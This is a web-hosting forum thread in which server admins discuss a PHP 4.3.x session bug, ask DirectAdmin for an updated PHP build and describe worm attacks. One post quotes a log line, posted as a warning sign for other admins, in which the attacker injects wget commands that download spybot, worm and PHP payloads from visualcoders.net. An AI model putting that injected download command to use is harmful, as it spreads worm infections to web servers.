New version with php dawned

AleSSaNDRo

AleSSaNDRo

Verified User
Joined
Nov 19, 2004
Messages
108
Location
Milano(Italy)
When will been released one DirectAdmin's version with modernized PHP?
All those that they use DirectAdmin have bugged PHP and it is not right, inasmuch as the licence costs also a lot!
 
PHP bug

Have a look at http://bugs.php.net/bug.php?id=25876

This seems to be a huge problem in PHP Sessions! I currently have a lot of hackers attempting to exploit the PHP bug, that was fixed in PHP the last .10 ver. of PHP. There still seems to be some messup with the sessions though.

Don't think the PHP team has fixed the bug yet. If anyone has manged to fix their own PHP in some way, please let me know, as I've been staring at this screen for two days now, trying to fix this mess.
 
But if at least staff of DirectAdmin release one version with php less bugged...
I know that the staff of php the bug has not patched all bug but at least, DirectAdmin, can supply a modernization to us with the last version of php that less it is bugged than that one that we have hour in our serveur :)
 
PHP Fix

I had this problem in PHP 4.3.07 as well. I upgraded to 4.10, and the problem stayed the same.

If you have a look at the bug report in PHP.net, this problem affects a whole array of servers running different vesions of PHP and Apache. Apparently, the problem could be fixed by recompiling PHP with the sessions.c from PHP 4.3.09 (if you look at one of the postings on the bug report).

Can DA please support a version of this fix as soon as possible, so we can upgrade our boxes? This might fix the probelem temporarily...

This problem affects serious applications like Squirrelmail, osCommerce, eGroupware, SugarCRM, etc.
 
Then we hope that they succeed to make one better version php to more soon and that staff of DirectAdmin the releases one modernized version :P


P.S. Sorry for my bad english but i'm italian :D
 
im a bit confused on this one. i upgraded to php 4.3.10 and have no problems running squirrelmail or anything else that i have on my server (including a custom app that uses session_start() )

running apache2 though.

--Josh
 
Apparently people have trouble with Apache 2 as well.

You might not know that you have the problem. It only occours when some circumstances coincide - as when a session is started at the same time in osCommerce as in Squirrelmail, and there are some files that are being attempted accessed by the two together.

It's a strange mix. Sometimes Squirrelmail works, and suddenly it doesn't. This only happened over the last couple of days, and not only to the ones who upgraded their PHP - it's a problem with earlier versions as well - although it hasn't emerged before.

My guess is that there is some connection with the new worm that is out. You can identify it trying to hack your server by someone trying to stick wget or cmd in the address line after your PHP code, and trying to download files from visualcoders.net or some other site.
 
Ah, but then it can be dawned php!
I thought that it had to wait for the new version of directadmin. How it is made to modernize it?
 
If DA could put in the session.c file from the .9 version, or/and add whatever should be done to the Apache config to have PHP use the correct session directories, then we should be able to simply run the ./build update and ./build php and/or ./build apache to upgrade our boxes, not to have the error occur again.

I don't trust myself to do this, and recompile PHP on my own. So if DA could do it, it would be excellent. Else, we would have to wait for a PHP 4.3.10rev.

This has been an old PHP problem, but as you can see from the bug-report on PHP.net, half of the filings have been from the last two days - a lot of people are having trouble with this, and it looks like a serious bug. Should be fixed urgently!
 
This bug has now suddenly disappeared from my server. This has coincided with the attacks hacing stopped.

Either I'm hacked, and the hackers are happy, or they have given up, or something else has happened that has stopped it.

Anyway - hacking stopped + PHP working = connection with hacking and PHP bug.

If you don't have something similar in your logfile at the moment:
wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/ worm1.txt;wget%20www.visualcoders.net/php.txt;
Click to expand...
you're probably fine as well.

But now I suddenly have all my session logfiles for PHP in my /tmp directory on my server. This happened after I did the ./build php upgrade to ver .10. These session files should probably be somewhere else, since I haven't seen them in this directory before...?
 
I don't know what's happening, but the visualcoders.net thing is still logging onto my server, and I'm still having trouble with PHP Sessions.

This is serious! Very few of my clients have been able to log into webmail/squirrelmail over the last few days, and most of the PHP applications breaks arbitrarely.

Anyone who have any idea, please rescue! I'm really tired of this right now. This bug has taken up several days of my time now, and I'm not in any way capable of figuring it out! I can't wait any longer!
 
You must log in or register to reply here.
Back
Top